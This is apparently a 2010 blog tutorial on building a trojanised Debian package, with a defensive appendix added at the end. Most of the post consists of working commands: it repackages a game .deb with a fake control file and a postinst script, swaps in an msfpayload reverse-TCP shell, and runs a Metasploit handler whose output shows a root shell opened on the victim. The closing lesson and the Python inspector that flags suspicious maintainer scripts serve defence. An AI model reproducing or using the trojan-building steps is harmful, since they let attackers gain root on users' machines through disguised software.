Tuesday, March 2, 2010

Build Your Own Trojan, Pt. 2

Not wanting to leave out the Linux side of things, here's a quick run-down of building a Trojan .deb file for targeting Ubuntu 9.10 or other Debian-based systems.

Again, this is an attack that exploits users more than it does any specific system vulnerability. Unfortunately many Linux users, particularly Ubuntu users (because a large percentage of them are new to computers, Linux, or security), will tend to be very trusting of others who offer them software or provide links to resources, and an unscrupulous attacker can take advantage of that.

All an attacker needs is a .deb. We'll use blast; it's a weird little game where you can turn your display into Swiss cheese.

root@zombi:/#apt-get install blast

Then make a directory to work in and move the blast package there:

root@zombi:/#mkdir /x
root@zombi:/x# cp /var/cache/apt/archives/blast_1.1-19_amd64.deb .
root@zombi:/x# dpkg -x blast_1.1-19_amd64.deb pkg
root@zombi:/x# mkdir pkg/DEBIAN

Next, make a control file that details your new package. This can be as fake or realistic as you like, but you must make sure the architecture is set to what your victim will be using (x86 vs amd64). Then add a post-install script that will run the Trojan binary:

root@zombi:/x# cd pkg/DEBIAN/
root@zombi:/x/pkg/DEBIAN# vim control

  Package: Blast
  Version: 0.666
  Section: Games And Amusement
  Priority: Optional
  Architecture: i386
  Maintainer: Deceased
  Description: Trojan Test


root@zombi:/x/pkg/DEBIAN# vim postinst

  #!/bin/sh
  sudo chmod 2755 /usr/games/blast && /usr/games/blast & /usr/games/blast &

root@zombi:/x/pkg/DEBIAN# chmod 755 postinst

Next, set up the payload. This is done just like the Windows Trojan, only using a Linux shell and a normal binary rather than a .exe; afterwards we build the new Trojan .deb package:

root@zombi:/x/pkg/DEBIAN# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.168.13 LPORT=9999 X > /x/pkg/usr/games/blast

root@zombi:/x/pkg/DEBIAN# dpkg-deb --build /x/pkg
root@zombi:/x# mv pkg.deb blast_0.666.deb

And back to our trusty listener on the attacker's machine, again just like before when exploiting Windows:

root@zombi:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.168.13 LPORT=9999 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.168.13:9999
[*] Starting the payload handler...

Now the attacker is all set with their Trojan .deb package and only needs to trick a user into running it. The beauty of this particular vector is that on Debian-based Linux systems a user must install packages as root or using sudo (ironically a security feature), which means that our Trojan will be executed as root.

---Through social engineering or some other method, the user is convinced to run our infected .deb ---

neurophobic@bt:~$ sudo dpkg -i blast_0.666.deb
tar: ./control: time stamp 2010-03-02 11:19:22 is 34.574471421 s in the future
tar: .: time stamp 2010-03-02 11:19:22 is 34.573961287 s in the future
Selecting previously deselected package blast.
(Reading database ... 269350 files and directories currently installed.)
Unpacking blast (from blast_0.666.deb) ...
Setting up blast (0.666) ...

Processing triggers for menu ...
Processing triggers for man-db ...

And the attacker is greeted with a nice little message:

[*] Sending stage (36 bytes)
[*] Sending stage (36 bytes)
[*] Command shell session 2 opened (192.168.168.13:9999 -> 192.168.168.144:52402)

hostname
bt
whoami
root

Today's lesson: stick to software in a trusted repository unless you really trust your source.
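The practical version of that lesson is to read a package's maintainer scripts before handing it to sudo dpkg -i, since those scripts are exactly what runs as root above. The following is an added example (not from the original post): a small Python inspector that parses the .deb container directly (an ar archive holding debian-binary, control.tar.* and data.tar.*), pulls preinst/postinst/prerm/postrm out of the control tarball, and flags the three things the postinst shown above relies on. The SUSPICIOUS heuristics, and the build_deb helper that packs a constructed sample package so the code runs without dpkg, are assumptions of this example.

```python
import io, re, tarfile

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}
# Constructed heuristics: patterns a legitimate maintainer script rarely needs.
SUSPICIOUS = [
    (r"\bsudo\b", "uses sudo (dpkg already runs these scripts as root)"),
    (r"chmod\s+([2467][0-7]{3}\b|[ugoa]*\+\w*s)", "sets a setuid/setgid bit"),
    (r"(?<![&>])&(?![&0-9])", "launches a background process"),
]

def ar_members(blob):
    """Yield (name, data) for each member of an ar archive (the outer .deb)."""
    if blob[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]                  # fixed 60-byte ASCII header
        name = hdr[:16].decode().strip().rstrip("/")
        size = int(hdr[48:58])
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)             # members are 2-byte aligned

def inspect_deb(blob):
    """Return {script: [findings]} for every maintainer script in control.tar.*."""
    report = {}
    for name, data in ar_members(blob):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
            for m in tar.getmembers():
                base = m.name.lstrip("./")
                if m.isfile() and base in MAINTAINER_SCRIPTS:
                    text = tar.extractfile(m).read().decode(errors="replace")
                    report[base] = [why for pat, why in SUSPICIOUS if re.search(pat, text)]
    return report

def build_deb(control, postinst):
    """Constructed sample input: pack a control file and postinst into a minimal .deb."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for fname, content in (("control", control), ("postinst", postinst)):
            info = tarfile.TarInfo("./" + fname)
            info.size, info.mode = len(content), 0o755
            tar.addfile(info, io.BytesIO(content))
    def entry(name, data):                        # one ar member: header + body
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n"
        return hdr.encode() + data + (b"\n" if len(data) % 2 else b"")
    return (b"!<arch>\n" + entry("debian-binary", b"2.0\n")
            + entry("control.tar.gz", buf.getvalue()))
```

On a Debian system, `dpkg-deb -e pkg.deb somedir` extracts the same scripts for manual review, and `dpkg-deb -I pkg.deb` prints the control file so the declared package name and version can be compared against what the distribution's repository actually ships.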
